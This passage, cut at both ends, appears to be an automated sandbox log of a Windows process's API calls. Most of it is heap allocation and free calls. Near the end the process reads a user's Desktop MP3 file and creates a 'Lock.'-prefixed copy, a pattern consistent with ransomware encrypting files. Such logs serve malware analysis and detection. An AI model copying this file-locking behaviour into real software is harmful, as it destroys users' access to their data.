lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0188.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0188.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0188.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0188.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0188.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0188.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0188.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0188.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0188.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0188.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0188.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0188.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0188.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0188.207] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0188.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0188.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0188.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0188.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0188.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0188.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0188.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0188.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0188.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0188.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0188.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0188.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Ljw5WYRO6Wy.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ljw5wyro6wy.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0188.252] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.252] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0188.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0188.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0188.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0188.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0188.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0188.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0188.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0188.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0188.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0188.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0188.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0188.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0188.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0188.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0188.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0188.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0188.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0188.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0188.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0188.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0188.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0188.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.256] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0188.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0188.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0188.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0188.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0188.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0188.256] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.Ljw5WYRO6Wy.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.ljw5wyro6wy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0188.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0188.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0188.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0188.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0188.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0188.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0188.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5e020 [0188.262] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0188.262] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x1267, lpOverlapped=0x0) returned 1 [0188.264] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0188.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0188.264] RtlAllocateHeap (HeapHandle=0x970000, 